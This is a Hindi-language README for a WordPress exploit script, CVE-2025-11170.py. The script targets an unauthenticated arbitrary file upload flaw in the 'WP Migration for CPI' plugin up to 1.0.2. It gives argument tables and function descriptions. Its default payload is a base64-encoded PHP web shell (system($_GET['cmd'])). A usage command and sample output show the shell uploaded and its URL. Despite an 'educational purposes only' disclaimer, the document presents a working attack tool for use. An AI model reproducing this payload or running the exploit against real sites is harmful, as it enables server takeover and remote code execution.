
WP प्रवासन प्लगइन for CPI <= 1.0.2 - बिना प्रमाणीकरण के मनमाना फ़ाइल अपलोड
CPI के लिए WP माइग्रेशन विशेष प्लगइन <= 1.0.2 - बिना प्रमाणीकरण के मनमानी फ़ाइल अपलोड
WordPress के लिए CPI के लिए WP माइग्रेशन विशेष प्लगइन प्लगइन, Cpiwm_Import_Controller::import फ़ंक्शन में फ़ाइल प्रकार सत्यापन की कमी के कारण संस्करण 1.0.2 तक (और इसमें शामिल) मनमानी फ़ाइल अपलोड के लिए असुरक्षित है।
यह बिना प्रमाणीकरण वाले हमलावरों को प्रभावित साइट के सर्वर पर मनमानी फ़ाइलें अपलोड करने की अनुमति देता है, जो संभावित रूप से दूरस्थ कोड निष्पादन को सक्षम कर सकता है।
CVE-2025-11170.py| तर्क | विवरण |
|---|---|
-u, --url | आधार लक्ष्य URL (जैसे: http://target.com/wordpress/)। स्क्रिप्ट स्वचालित रूप से wp-admin/admin-ajax.php जोड़ता है। |
-f, --filename | अपलोड करने के लिए शेल या फ़ाइल का नाम। डिफ़ॉल्ट: shell.php |
-d, --data | बेस64 में फ़ाइल सामग्री (या कच्चा पाठ)। डिफ़ॉल्ट: PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ID8+ |
-i, --index | इंडेक्स फ़ील्ड मान। डिफ़ॉल्ट: 0 |
-H, --headers | अतिरिक्त HTTP हेडर (प्रारूप: X-Key:Value;K2:Value2) |
-t, --timeout | HTTP अनुरोध के लिए टाइमआउट (सेकंड)। डिफ़ॉल्ट: 10 |
--retries | पुनः प्रयास प्रयासों की संख्या। डिफ़ॉल्ट: 3 |
--backoff | पुनः प्रयासों के बीच बैकऑफ़ गुणक (सेकंड)। डिफ़ॉल्ट: 0.7 |
-v, --verbose | डीबगिंग के लिए वर्बोज़िटी बढ़ाएँ (दोहराने योग्य) |
Nxploited_parse_args
इनपुट तर्कों को पार्स और सत्यापित करता है। सही एंडपॉइंट संरचना, हेडर और डेटा एन्कोडिंग सुनिश्चित करता है।
Nxploited_logging
उन्नत लॉगिंग और वर्बोज़िटी सेट करता है, विस्तृत या न्यूनतम रनटाइम आउटपुट के लिए।
Nxploited_retry_session
लचीले संचार के लिए पुनः प्रयास और बैकऑफ़ तर्क के साथ एक स्थायी सत्र आरंभ करता है।
Nxploited_build_payload
एक्सप्लॉइटेशन के लिए POST अनुरोध पैरामीटर बनाता है।
Nxploited_send
असुरक्षित एंडपॉइंट पर वास्तविक POST अनुरोध करता है और प्रतिक्रियाओं/त्रुटियों का प्रबंधन करता है।
Nxploited_output_result
प्रतिक्रिया को संसाधित और प्रारूपित करता है, सफलता पर शेल पथ प्रदर्शित करता है, अन्यथा डीबगिंग जानकारी।
python3 CVE-2025-11170.py -u "http://192.168.100.74:888/wordpress/" -f "shell.php"
उदाहरण आउटपुट:
Uploading shell...
Processing response...
[+] Upload successful!
Shell path:
http://192.168.100.74:888/wordpress/wp-content/plugins/cpi-wp-migration/storage/shell.php
Nxploited
मेरा GitHub: https://github.com/Nxploited
यह स्क्रिप्ट केवल शैक्षिक उद्देश्यों के लिए प्रदान की गई है।
उचित प्राधिकरण के बिना लक्ष्यों पर इस एक्सप्लॉइट का उपयोग अवैध हो सकता है।
लेखक किसी भी दुरुपयोग, क्षति या कानूनी परिणामों के लिए कोई जिम्मेदारी नहीं लेता है।
GitHub: Nxploited
Telegram: KNxploited
द्वारा: Nxploited ( खालिद अलेनाज़ी )